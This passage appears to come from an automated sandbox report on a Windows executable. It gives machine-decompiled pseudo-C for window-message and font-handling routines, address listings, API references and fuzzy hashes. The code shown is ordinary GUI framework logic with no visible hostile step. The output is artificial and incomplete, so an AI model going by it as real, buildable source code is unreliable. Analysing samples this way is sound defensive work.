									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E0044FDEC(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043C1F4(_v8),  *(0x476bc8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043C1F4(_v8),  *(0x476bc8 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406d84, E0043C1F4(_v8), 5, 0, _t220);
								E00435DD4();
							} else {
								_t231 = E0043C1F4(_v8);
								_t232 =  *0x492c04; // 0x2410d40
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043C1F4(_v8), 3);
							}
							_t226 =  *0x492c04; // 0x2410d40
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x451ea0);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}

0x0045194d
0x0045194f
0x00451957
0x0045195a
0x0045195f
0x00451960
0x00451965
0x00451968
0x00451972
0x00451983
0x00451988
0x00451997
0x0045199c
0x0045199c
0x004519a1
0x004519a6
0x004519ae
0x004519b7
0x004519b8
0x004519bd
0x004519c0
0x004519ca
0x004519d0
0x004519d3
0x004519da
0x00451d7e
0x00451d7f
0x00451d84
0x00451d87
0x00451d91
0x00451d9b
0x00451db7
0x00451dbf
0x00451dc2
0x00451dc4
0x00451dc9
0x00451dc9
0x00451dce
0x00451dd1
0x00451dd8
0x00451de7
0x00451dea
0x00451df1
0x00451e12
0x00451e17
0x00451e1e
0x00451e23
0x00451e25
0x00451e30
0x00451e35
0x00451e37
0x00451e46
0x00451e46
0x00451e37
0x00451e48
0x00451e4a
0x00451e7c
0x00451e4c
0x00451e64
0x00451e6a
0x00451e6a
0x00451df3
0x00451e0b
0x00451e0b
0x00451dda
0x00451ddd
0x00451ddd
0x004519e0
0x004519e2
0x004519e3
0x004519e8
0x004519eb
0x004519f5
0x004519ff
0x00451a25
0x00451a51
0x00451a9a
0x00451a9a
0x00451a9d
0x00451a9f
0x00451aa1
0x00451aa1
0x00451ab1
0x00451ab1
0x00451ab4
0x00451ab6
0x00451ab8
0x00451ab8
0x00451a53
0x00451a53
0x00451a65
0x00451a68
0x00451a6a
0x00451a6c
0x00451a6c
0x00451a6f
0x00451a7f
0x00451a82
0x00451a84
0x00451a86
0x00451a86
0x00451a84
0x00451abd
0x00451abf
0x00451abf
0x00451ac3
0x00451ac5
0x00451ac5
0x00451ad5
0x00451ade
0x00451aeb
0x00451af4
0x00451af4
0x00451afe
0x00451b01
0x00451b0c
0x00451b0f
0x00451be3
0x00451be5
0x00451beb
0x00451bee
0x00451bf5
0x00451c3e
0x00451c3e
0x00451c41
0x00451c43
0x00451c45
0x00451c45
0x00451c55
0x00451c55
0x00451c58
0x00451c5a
0x00451c5c
0x00451c5c
0x00451bf7
0x00451bf7
0x00451c09
0x00451c09
0x00451c0c
0x00451c0e
0x00451c10
0x00451c10
0x00451c13
0x00451c23
0x00451c23
0x00451c26
0x00451c28
0x00451c2a
0x00451c2a
0x00451c28
0x00451c5f
0x00451c61
0x00451c63
0x00451c63
0x00451c63
0x00451c65
0x00451c67
0x00451c69
0x00451c69
0x00451c69
0x00451c82
0x00451c82
0x00451b15
0x00451b15
0x00451b1a
0x00451b1d
0x00451b20
0x00451b27
0x00451b2f
0x00451b35
0x00451b3a
0x00451b3c
0x00451b41
0x00451b41
0x00451b3c
0x00451b44
0x00451b46
0x00451b7f
0x00451b7f
0x00451b82
0x00451b84
0x00451b86
0x00451b86
0x00451b96
0x00451b96
0x00451b99
0x00451b9b
0x00451b9d
0x00451b9d
0x00451b48
0x00451b4e
0x00451b4e
0x00451b51
0x00451b53
0x00451b55
0x00451b55
0x00451b58
0x00451b61
0x00451b61
0x00451b64
0x00451b66
0x00451b68
0x00451b68
0x00451b6b
0x00451b6b
0x00451ba0
0x00451ba2
0x00451ba4
0x00451ba4
0x00451ba4
0x00451ba6
0x00451ba8
0x00451baa
0x00451baa
0x00451baa
0x00451bba
0x00451bc3
0x00451bc9
0x00451bcc
0x00451bd0
0x00451bd9
0x00451bd9
0x00451bd0
0x00451b0f
0x00451c8b
0x00451c9c
0x00451d72
0x00451ca2
0x00451cac
0x00451cff
0x00451d13
0x00451d13
0x00451d28
0x00451d30
0x00451cae
0x00451cb3
0x00451cbe
0x00451ccd
0x00451cdd
0x00451cdd
0x00451d3e
0x00451d4d
0x00451d4d
0x00451c9c
0x004519da
0x00451e83
0x00451e86
0x00451e89
0x00451e8e
0x00451e91
0x00451e98

APIs

SendMessageA.USER32 ref: 00451CCD

Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadMessageSendString
String ID:
API String ID: 1946433856-0
Opcode ID: b04be16a98f3b84a1d84bbe9ae8db85398f7ce53e1604c2673c01cbf06150d9f
Instruction ID: 300ddb75549afbc40e5faef4ff068dcdb6cfc4397da42f21fc66367e2d171d31
Opcode Fuzzy Hash: b04be16a98f3b84a1d84bbe9ae8db85398f7ce53e1604c2673c01cbf06150d9f
Instruction Fuzzy Hash: 1BF15D30A04244EFDB01DBA9C9C5B9E77F5AB08305F2541B6E900AB363D779EE45DB48

Uniqueness

Uniqueness Score: -1.00%

Function 0046BD44, Relevance: 18.2, APIs: 9, Strings: 1, Instructions: 727
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0046BD44(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				char _v21;
				char _v22;
				short _v24;
				short _v26;
				void* _v42;
				intOrPtr _v78;
				char _v82;
				struct tagLOGFONTA _v142;
				char _v148;
				char _v156;
				intOrPtr _t339;
				signed int _t352;
				signed int _t365;
				intOrPtr _t366;
				intOrPtr _t371;
				signed int _t373;
				intOrPtr _t378;
				intOrPtr _t381;
				intOrPtr _t382;
				signed int _t396;
				intOrPtr _t405;
				intOrPtr _t407;
				intOrPtr _t416;
				signed int _t428;
				signed int _t430;
				signed int _t438;
				signed int _t440;
				signed int _t446;
				signed int _t454;
				signed int _t456;
				signed int _t458;
				intOrPtr _t459;
				signed int _t461;
				signed int _t463;
				intOrPtr _t465;
				signed int _t467;
				signed int _t486;
				signed int _t488;
				signed int _t491;
				signed int _t493;
				signed int _t498;
				intOrPtr _t504;
				long _t506;
				int _t508;
				void* _t520;
				signed int _t531;
				void* _t548;
				intOrPtr _t552;
				signed int _t566;
				signed int _t569;
				intOrPtr _t577;
				intOrPtr _t586;
				intOrPtr _t589;
				signed int _t595;
				intOrPtr _t597;
				signed int _t611;
				intOrPtr _t615;
				intOrPtr _t631;
				intOrPtr _t632;
				intOrPtr _t633;
				intOrPtr _t634;
				intOrPtr _t638;
				intOrPtr _t639;
				struct HWND__* _t640;
				signed char _t647;
				intOrPtr _t682;
				signed int _t683;
				signed int _t685;
				intOrPtr _t686;
				intOrPtr _t695;
				intOrPtr _t699;
				intOrPtr _t707;
				intOrPtr _t711;
				intOrPtr _t727;
				signed int _t744;
				signed int _t749;
				intOrPtr _t762;
				signed int _t767;
				signed int _t772;
				void* _t783;
				void* _t784;
				signed int _t789;
				intOrPtr _t791;
				signed int _t792;
				signed int _t793;
				signed int _t795;
				signed int _t799;
				void* _t800;
				intOrPtr _t806;
				void* _t815;
				void* _t816;
				intOrPtr _t817;
				void* _t818;
				void* _t819;

				_t815 = _t816;
				_t817 = _t816 + 0xffffff68;
				_push(__ebx);
				_v148 = 0;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t815);
				_push(0x46c76c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t817;
				_t339 =  *((intOrPtr*)(_v12 + 8));
				_t682 =  *((intOrPtr*)(_t339 + 8));
				_t818 = _t682 - 0xfffffe6b;
				if(_t818 > 0) {
					__eflags = _t682 - 0xfffffe6f;
					if(__eflags > 0) {
						_t683 = _t682 - 0xfffffff4;
						__eflags = _t683;
						if(_t683 == 0) {
							_t685 =  *(_v8 + 0x20c);
							__eflags = _t685;
							if(_t685 == 0) {
								goto L114;
							} else {
								_t615 = _t339;
								E00420334(_t685);
								_push(_t815);
								_push(0x46c35a);
								_push( *[fs:edx]);
								 *[fs:edx] = _t817;
								 *(_v12 + 0xc) = 0;
								__eflags =  *(_t615 + 0xe) & 0x00000001;
								if(( *(_t615 + 0xe) & 0x00000001) != 0) {
									E00402EF0( &_v82, 0x28);
									_v78 =  *((intOrPtr*)(_t615 + 0x24));
									_t789 = E0046BD1C(_v8,  &_v82);
									__eflags = _t789;
									if(_t789 != 0) {
										_t352 =  *(_t615 + 0xc) - 0x10001;
										__eflags = _t352;
										if(_t352 == 0) {
											__eflags =  *(_t615 + 0xc) & 0x00010002;
											if(( *(_t615 + 0xc) & 0x00010002) != 0) {
												_t416 = _v8;
												_t707 = _v8;
												__eflags =  *((intOrPtr*)(_t416 + 0x288)) +  *((intOrPtr*)(_t707 + 0x28c));
												if( *((intOrPtr*)(_t416 + 0x288)) +  *((intOrPtr*)(_t707 + 0x28c)) != 0) {
													SelectObject( *(_t615 + 0x10),  *(_v8 + 0x28c));
													DeleteObject( *(_v8 + 0x288));
													 *(_v8 + 0x288) = 0;
													__eflags = 0;
													 *(_v8 + 0x28c) = 0;
												}
											}
											_push(_t815);
											_push(0x46c2b5);
											_push( *[fs:edx]);
											 *[fs:edx] = _t817;
											E00420784( *(_v8 + 0x20c),  *(_t615 + 0x10));
											E00420600( *(_v8 + 0x20c));
											E0042061C( *(_v8 + 0x20c));
											__eflags =  *(_t615 + 0x28) & 0x00000001;
											if(( *(_t615 + 0x28) & 0x00000001) != 0) {
												E0041F400( *((intOrPtr*)( *(_v8 + 0x20c) + 0xc)), 0x8000000e);
												E0041FBEC( *((intOrPtr*)( *(_v8 + 0x20c) + 0x14)), 0, 0x8000000d, _t789, _t815, __eflags);
											}
											_t365 =  *(_v8 + 0x20c);
											_t695 =  *((intOrPtr*)(_t365 + 0xc));
											 *((intOrPtr*)(_t695 + 0xc)) = _v8;
											 *((intOrPtr*)(_t695 + 8)) = 0x46d0f4;
											_t366 =  *((intOrPtr*)(_t365 + 0x14));
											 *((intOrPtr*)(_t366 + 0xc)) = _v8;
											 *((intOrPtr*)(_t366 + 8)) = 0x46d0f4;
											 *((char*)(_v8 + 0x210)) = 0;
											_t647 =  *(_t615 + 0x28);
											_v21 =  *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 0);
											__eflags = _v22;
											if(_v22 == 0) {
												_t407 = _v12;
												_t131 = _t407 + 0xc;
												 *_t131 =  *(_t407 + 0xc) | 0x00010000;
												__eflags =  *_t131;
											}
											__eflags = _v21;
											if(_v21 != 0) {
												_t371 = _v8;
												__eflags =  *((char*)(_t371 + 0x210));
												if( *((char*)(_t371 + 0x210)) != 0) {
													 *((char*)(_v8 + 0x210)) = 0;
													_t799 =  *(_v8 + 0x20c);
													_t381 =  *((intOrPtr*)(_t799 + 0xc));
													 *((intOrPtr*)(_t381 + 8)) = 0;
													 *((intOrPtr*)(_t381 + 0xc)) = 0;
													_t382 =  *((intOrPtr*)(_t799 + 0x14));
													 *((intOrPtr*)(_t382 + 8)) = 0;
													 *((intOrPtr*)(_t382 + 0xc)) = 0;
													_t150 = _v12 + 8; // 0x5875c984
													_t791 =  *_t150;
													 *((intOrPtr*)(_t791 + 0x30)) = E0041EF40( *((intOrPtr*)( *((intOrPtr*)(_t799 + 0xc)) + 0x18)));
													 *((intOrPtr*)(_t791 + 0x34)) = E0041EF40(E0041FBE4( *((intOrPtr*)( *(_v8 + 0x20c) + 0x14))));
													_t396 = GetObjectA(E0041F414( *((intOrPtr*)( *(_v8 + 0x20c) + 0xc)), _t615, _t647), 0x3c,  &_v142);
													__eflags = _t396;
													if(_t396 != 0) {
														E00420784( *(_v8 + 0x20c), 0);
														_t800 = CreateFontIndirectA( &_v142);
														 *(_v8 + 0x288) = _t800;
														 *(_v8 + 0x28c) = SelectObject( *(_t615 + 0x10), _t800);
														_t405 = _v12;
														_t171 = _t405 + 0xc;
														 *_t171 =  *(_t405 + 0xc) | 0x00000002;
														__eflags =  *_t171;
													}
												}
											} else {
												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000004;
											}
											_t373 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t373;
											if(_t373 != 0) {
												_t378 = _v12;
												_t176 = _t378 + 0xc;
												 *_t176 =  *(_t378 + 0xc) | 0x00000010;
												__eflags =  *_t176;
											}
											_pop(_t699);
											 *[fs:eax] = _t699;
											_push(0x46c33e);
											__eflags = 0;
											return E00420784( *(_v8 + 0x20c), 0);
										} else {
											_t428 = _t352 - 1;
											__eflags = _t428;
											if(_t428 == 0) {
												_t430 =  *((intOrPtr*)( *_v8 + 0xdc))();
												__eflags = _t430;
												if(_t430 != 0) {
													 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 1);
												}
											} else {
												_t438 = _t428 - 1;
												__eflags = _t438;
												if(_t438 == 0) {
													_t440 =  *((intOrPtr*)( *_v8 + 0xdc))();
													__eflags = _t440;
													if(_t440 != 0) {
														 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 2);
													}
												} else {
													__eflags = _t438 == 1;
													if(_t438 == 1) {
														_t446 =  *((intOrPtr*)( *_v8 + 0xdc))();
														__eflags = _t446;
														if(_t446 != 0) {
															 *((intOrPtr*)( *_v8 + 0xd0))( &_v22, 3);
														}
													}
												}
											}
											goto L71;
										}
									} else {
										E00403E54();
										goto L114;
									}
								} else {
									 *((intOrPtr*)( *_v8 + 0x44))();
									_t454 =  *(_t615 + 0xc) - 1;
									__eflags = _t454;
									if(_t454 == 0) {
										_t456 =  *((intOrPtr*)( *_v8 + 0xdc))();
										__eflags = _t456;
										if(_t456 == 0) {
											_t458 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t458;
											if(_t458 != 0) {
												L32:
												_t459 = _v12;
												_t43 = _t459 + 0xc;
												 *_t43 =  *(_t459 + 0xc) | 0x00000020;
												__eflags =  *_t43;
											} else {
												_t467 =  *((intOrPtr*)( *_v8 + 0xdc))();
												__eflags = _t467;
												if(_t467 != 0) {
													goto L32;
												}
											}
											_t461 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t461;
											if(_t461 != 0) {
												_t465 = _v12;
												_t48 = _t465 + 0xc;
												 *_t48 =  *(_t465 + 0xc) | 0x00000010;
												__eflags =  *_t48;
											}
											_t463 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t463;
											if(_t463 != 0) {
												 *(_v12 + 0xc) =  *(_v12 + 0xc) | 0x00000040;
											}
											goto L71;
										} else {
											 *[fs:eax] = _t817;
											E00420784( *(_v8 + 0x20c),  *(_t615 + 0x10));
											E00420600( *(_v8 + 0x20c));
											E0042061C( *(_v8 + 0x20c));
											_v21 =  *((intOrPtr*)( *_v8 + 0xcc))( *[fs:eax], 0x46bf0d, _t815);
											_pop(_t727);
											 *[fs:eax] = _t727;
											_push(0x46bf14);
											__eflags = 0;
											return E00420784( *(_v8 + 0x20c), 0);
										}
									} else {
										_t486 = _t454 - 1;
										__eflags = _t486;
										if(_t486 == 0) {
											_t488 =  *((intOrPtr*)( *_v8 + 0xdc))();
											__eflags = _t488;
											if(_t488 != 0) {
												 *((intOrPtr*)( *_v8 + 0xcc))();
											}
										} else {
											_t491 = _t486 - 1;
											__eflags = _t491;
											if(_t491 == 0) {
												_t493 =  *((intOrPtr*)( *_v8 + 0xdc))();
												__eflags = _t493;
												if(_t493 != 0) {
													 *((intOrPtr*)( *_v8 + 0xcc))();
												}
											} else {
												__eflags = _t491 == 1;
												if(_t491 == 1) {
													_t498 =  *((intOrPtr*)( *_v8 + 0xdc))();
													__eflags = _t498;
													if(_t498 != 0) {
														 *((intOrPtr*)( *_v8 + 0xcc))();
													}
												}
											}
										}
										L71:
										__eflags = 0;
										_pop(_t711);
										 *[fs:eax] = _t711;
										_push(0x46c753);
										return E004205D8( *(_v8 + 0x20c));
									}
								}
							}
						} else {
							__eflags = _t683 == 7;
							if(_t683 == 7) {
								 *((intOrPtr*)(_v8 + 0x240)) = 0;
								GetCursorPos( &_v20);
								_t504 = _v8;
								__eflags =  *((char*)(_t504 + 0x244));
								if( *((char*)(_t504 + 0x244)) == 0) {
									_t506 = E004072FC( &_v20, 0);
									_t508 = E0043C1F4(_v8);
									PostMessageA(E0043C1F4(_v8), 0xbc7b, _t508, _t506);
								} else {
									E004356B8(_v8,  &_v156,  &_v20);
									_v26 = E004072FC( &_v156,  &_v156);
									 *((intOrPtr*)(_v8 + 0x240)) = E0046BA54(_v8, _v24, _v26);
									_t520 = E004072FC( &_v20, _v24);
									E00436D28(_v8, E0043C1F4(_v8), 0x7b, _t520);
									 *((intOrPtr*)(_v8 + 0x240)) = 0;
								}
								 *(_v12 + 0xc) = 1;
							}
							goto L114;
						}
					} else {
						if(__eflags == 0) {
							goto L91;
						} else {
							_t744 = _t682 - 0xfffffe6c;
							__eflags = _t744;
							if(_t744 == 0) {
								_t631 = _t339;
								_t792 = E0046BD1C(_v8, _t631 + 0xc);
								__eflags = _t792;
								if(_t792 != 0) {
									__eflags =  *(_t631 + 0xc) & 0x00000001;
									if(( *(_t631 + 0xc) & 0x00000001) != 0) {
										E00404538( &_v148,  *((intOrPtr*)(_t631 + 0x1c)));
										E0046959C(_t792, _v148);
									}
								}
							} else {
								_t749 = _t744 - 1;
								__eflags = _t749;
								if(_t749 == 0) {
									_t632 = _t339;
									_t793 = E0046BD1C(_v8, _t632 + 0xc);
									__eflags = _t793;
									if(_t793 != 0) {
										__eflags =  *(_t632 + 0xc) & 0x00000001;
										if(( *(_t632 + 0xc) & 0x00000001) != 0) {
											_t548 = E004047F8( *((intOrPtr*)(_t793 + 8)));
											__eflags =  *((intOrPtr*)(_t632 + 0x20)) - 1;
											E00408C38( *((intOrPtr*)(_t632 + 0x1c)),  *((intOrPtr*)(_t632 + 0x20)) - 1, _t548);
										}
										__eflags =  *(_t632 + 0xc) & 0x00000002;
										if(( *(_t632 + 0xc) & 0x00000002) != 0) {
											 *((intOrPtr*)( *_v8 + 0xd4))();
											 *((intOrPtr*)(_t632 + 0x24)) =  *((intOrPtr*)(_t793 + 0x14));
										}
										__eflags =  *(_t632 + 0xc) & 0x00000020;
										if(( *(_t632 + 0xc) & 0x00000020) != 0) {
											 *((intOrPtr*)( *_v8 + 0xd8))();
											 *((intOrPtr*)(_t632 + 0x28)) =  *((intOrPtr*)(_t793 + 0x18));
										}
									}
								} else {
									__eflags = _t749 == 1;
									if(_t749 == 1) {
										goto L93;
									} else {
									}
								}
							}
						}
						goto L114;
					}
				} else {
					if(_t818 == 0) {
						_t762 = _v8;
						__eflags =  *((char*)(_t762 + 0x245));
						if( *((char*)(_t762 + 0x245)) == 0) {
							_t634 = _t339;
							E0046BD1C(_v8, _t634 + 0x38);
							__eflags =  *((intOrPtr*)(_t634 + 0xc)) - 2;
							if(__eflags != 0) {
								L83:
								__eflags =  *((intOrPtr*)(_t634 + 0xc)) - 1;
								if(__eflags == 0) {
									_t566 = E004037D8(_v8, __eflags);
									__eflags = _t566;
									if(_t566 == 0) {
										 *(_v12 + 0xc) = 1;
									}
								}
							} else {
								_t569 = E004037D8(_v8, __eflags);
								__eflags = _t569;
								if(_t569 != 0) {
									goto L83;
								} else {
									 *(_v12 + 0xc) = 1;
								}
							}
						}
					} else {
						_t819 = _t682 - 0xfffffe66;
						if(_t819 > 0) {
							_t767 = _t682 - 0xfffffe67;
							__eflags = _t767;
							if(_t767 == 0) {
								_t795 = E0046BD1C(_v8, _t339 + 0x10);
								__eflags = _t795;
								if(_t795 != 0) {
									 *((intOrPtr*)(_t795 + 0x10)) = 0;
									E0042E56C( *((intOrPtr*)(_v8 + 0x330)), 0);
									_t577 = _v8;
									__eflags =  *((char*)(_t577 + 0x25c));
									if( *((char*)(_t577 + 0x25c)) == 0) {
										E0046A7D0(_t795);
									} else {
										E0046A4B0(_t795);
									}
								}
							} else {
								_t772 = _t767 - 2;
								__eflags = _t772;
								if(_t772 == 0) {
									 *((char*)(_v8 + 0x218)) = 1;
									 *((intOrPtr*)(_v8 + 0x220)) = E0046BD1C(_v8,  *((intOrPtr*)(_v12 + 8)) + 0x38);
								} else {
									__eflags = _t772 == 1;
									if(_t772 == 1) {
										_t586 = _v8;
										__eflags =  *((char*)(_t586 + 0x245));
										if( *((char*)(_t586 + 0x245)) == 0) {
											_t638 =  *((intOrPtr*)(_v12 + 8));
											E0046BD1C(_v8, _t638 + 0x38);
											_t589 =  *((intOrPtr*)(_t638 + 0xc));
											__eflags = _t589 - 2;
											if(__eflags != 0) {
												__eflags = _t589 - 1;
												if(__eflags == 0) {
													E004037D8(_v8, __eflags);
												}
											} else {
												E004037D8(_v8, __eflags);
											}
										}
									}
								}
							}
						} else {
							if(_t819 == 0) {
								_t639 = _t339;
								_t595 = E004362E4(_v8);
								__eflags = _t595;
								if(_t595 != 0) {
									L75:
									 *(_v12 + 0xc) = 1;
								} else {
									E0046BD1C(_v8, _t639 + 0xc);
									_t611 = E004037D8(_v8, __eflags);
									__eflags = _t611;
									if(_t611 == 0) {
										goto L75;
									}
								}
								_t597 = _v12;
								__eflags =  *(_t597 + 0xc);
								if( *(_t597 + 0xc) == 0) {
									_t640 = E004270CC(E0043C1F4(_v8));
									 *(_v8 + 0x224) = _t640;
									 *((intOrPtr*)(_v8 + 0x214)) = GetWindowLongA(_t640, 0xfffffffc);
									SetWindowLongA( *(_v8 + 0x224), 0xfffffffc,  *(_v8 + 0x228));
								}
							} else {
								_t783 = _t682 - 0xfffffe3d;
								if(_t783 == 0) {
									L93:
									_t806 = _t339;
									_t552 =  *((intOrPtr*)(_v8 + 0x330));
									__eflags =  *(_t552 + 0x30);
									if( *(_t552 + 0x30) <= 0) {
										E0046BD1C(_v8, _t806 + 0x38);
										E004037D8(_v8, __eflags);
									} else {
										_t633 = _t552;
										E0042E56C(_t633, 0);
										 *((intOrPtr*)(_t633 + 0xc)) = E0046BD1C(_v8, _t806 + 0x38);
										E0042E56C(_t633, 1);
									}
								} else {
									_t784 = _t783 - 1;
									if(_t784 == 0) {
										L91:
										E0046BD1C(_v8,  *((intOrPtr*)(_v12 + 8)) + 0x38);
										_t531 = E004037D8(_v8, __eflags);
										__eflags = _t531;
										if(_t531 == 0) {
											 *(_v12 + 0xc) = 1;
										}
									} else {
										if(_t784 == 0x27) {
											E004037D8(_v8, __eflags);
										}
									}
								}
							}
						}
					}
					L114:
					_pop(_t686);
					 *[fs:eax] = _t686;
					_push(0x46c773);
					return E00404348( &_v148);
				}
			}

0x0046bd45
0x0046bd47
0x0046bd4d
0x0046bd52
0x0046bd58
0x0046bd5b
0x0046bd60
0x0046bd61
0x0046bd66
0x0046bd69
0x0046bd6f
0x0046bd72
0x0046bd75
0x0046bd7b
0x0046bdd3
0x0046bdd9
0x0046be00
0x0046be00
0x0046be03
0x0046be16
0x0046be1c
0x0046be1e
0x00000000
0x0046be24
0x0046be27
0x0046be2b
0x0046be32
0x0046be33
0x0046be38
0x0046be3b
0x0046be43
0x0046be46
0x0046be4a
0x0046c026
0x0046c02e
0x0046c03c
0x0046c03e
0x0046c040
0x0046c04f
0x0046c04f
0x0046c054
0x0046c070
0x0046c077
0x0046c079
0x0046c082
0x0046c08b
0x0046c08d
0x0046c09d
0x0046c0ac
0x0046c0b6
0x0046c0bf
0x0046c0c1
0x0046c0c1
0x0046c08d
0x0046c0c9
0x0046c0ca
0x0046c0cf
0x0046c0d2
0x0046c0e1
0x0046c0f5
0x0046c10c
0x0046c111
0x0046c115
0x0046c128
0x0046c13e
0x0046c13e
0x0046c146
0x0046c14c
0x0046c152
0x0046c155
0x0046c15c
0x0046c162
0x0046c165
0x0046c16f
0x0046c17c
0x0046c18d
0x0046c190
0x0046c194
0x0046c196
0x0046c199
0x0046c199
0x0046c199
0x0046c199
0x0046c1a0
0x0046c1a4
0x0046c1b2
0x0046c1b5
0x0046c1bc
0x0046c1c5
0x0046c1cf
0x0046c1d5
0x0046c1da
0x0046c1dd
0x0046c1e0
0x0046c1e5
0x0046c1e8
0x0046c1ee
0x0046c1ee
0x0046c1fc
0x0046c215
0x0046c233
0x0046c238
0x0046c23a
0x0046c247
0x0046c258
0x0046c25d
0x0046c270
0x0046c276
0x0046c279
0x0046c279
0x0046c279
0x0046c279
0x0046c23a
0x0046c1a6
0x0046c1a9
0x0046c1a9
0x0046c286
0x0046c28c
0x0046c28e
0x0046c290
0x0046c293
0x0046c293
0x0046c293
0x0046c293
0x0046c299
0x0046c29c
0x0046c29f
0x0046c2ad
0x0046c2b4
0x0046c056
0x0046c056
0x0046c056
0x0046c057
0x0046c2c5
0x0046c2cb
0x0046c2cd
0x0046c2e0
0x0046c2e0
0x0046c05d
0x0046c05d
0x0046c05d
0x0046c05e
0x0046c2f1
0x0046c2f7
0x0046c2f9
0x0046c30c
0x0046c30c
0x0046c064
0x0046c064
0x0046c065
0x0046c31d
0x0046c323
0x0046c325
0x0046c338
0x0046c338
0x0046c325
0x0046c065
0x0046c05e
0x00000000
0x0046c057
0x0046c042
0x0046c042
0x00000000
0x0046c042
0x0046be50
0x0046be58
0x0046be5e
0x0046be5e
0x0046be5f
0x0046be84
0x0046be8a
0x0046be8c
0x0046bf37
0x0046bf3d
0x0046bf3f
0x0046bf54
0x0046bf54
0x0046bf57
0x0046bf57
0x0046bf57
0x0046bf41
0x0046bf4a
0x0046bf50
0x0046bf52
0x00000000
0x00000000
0x0046bf52
0x0046bf64
0x0046bf6a
0x0046bf6c
0x0046bf6e
0x0046bf71
0x0046bf71
0x0046bf71
0x0046bf71
0x0046bf7e
0x0046bf84
0x0046bf86
0x0046bf8f
0x0046bf8f
0x00000000
0x0046be92
0x0046be9d
0x0046beac
0x0046bec0
0x0046bed7
0x0046beec
0x0046bef1
0x0046bef4
0x0046bef7
0x0046bf05
0x0046bf0c
0x0046bf0c
0x0046be61
0x0046be61
0x0046be61
0x0046be62
0x0046bfa1
0x0046bfa7
0x0046bfa9
0x0046bfb9
0x0046bfb9
0x0046be68
0x0046be68
0x0046be68
0x0046be69
0x0046bfcd
0x0046bfd3
0x0046bfd5
0x0046bfe5
0x0046bfe5
0x0046be6f
0x0046be6f
0x0046be70
0x0046bff9
0x0046bfff
0x0046c001
0x0046c011
0x0046c011
0x0046c001
0x0046be70
0x0046be69
0x0046c33e
0x0046c33e
0x0046c340
0x0046c343
0x0046c346
0x0046c359
0x0046c359
0x0046be5f
0x0046be4a
0x0046be05
0x0046be05
0x0046be08
0x0046c6a4
0x0046c6ae
0x0046c6b3
0x0046c6b6
0x0046c6bd
0x0046c727
0x0046c730
0x0046c744
0x0046c6bf
0x0046c6cb
0x0046c6db
0x0046c6f1
0x0046c6fa
0x0046c712
0x0046c71c
0x0046c71c
0x0046c74c
0x0046c74c
0x00000000
0x0046be08
0x0046bddb
0x0046bddb
0x00000000
0x0046bde1
0x0046bde1
0x0046bde1
0x0046bde7
0x0046c5ed
0x0046c5fa
0x0046c5fc
0x0046c5fe
0x0046c604
0x0046c608
0x0046c617
0x0046c624
0x0046c624
0x0046c608
0x0046bded
0x0046bded
0x0046bded
0x0046bdee
0x0046c631
0x0046c63e
0x0046c640
0x0046c642
0x0046c648
0x0046c64c
0x0046c651
0x0046c65b
0x0046c65f
0x0046c65f
0x0046c664
0x0046c668
0x0046c671
0x0046c67a
0x0046c67a
0x0046c67d
0x0046c681
0x0046c68e
0x0046c697
0x0046c697
0x0046c681
0x0046bdf4
0x0046bdf4
0x0046bdf5
0x00000000
0x00000000
0x0046bdfb
0x0046bdf5
0x0046bdee
0x0046bde7
0x00000000
0x0046bddb
0x0046bd7d
0x0046bd7d
0x0046c42f
0x0046c432
0x0046c439
0x0046c442
0x0046c44a
0x0046c451
0x0046c455
0x0046c478
0x0046c478
0x0046c47c
0x0046c48b
0x0046c490
0x0046c492
0x0046c49b
0x0046c49b
0x0046c492
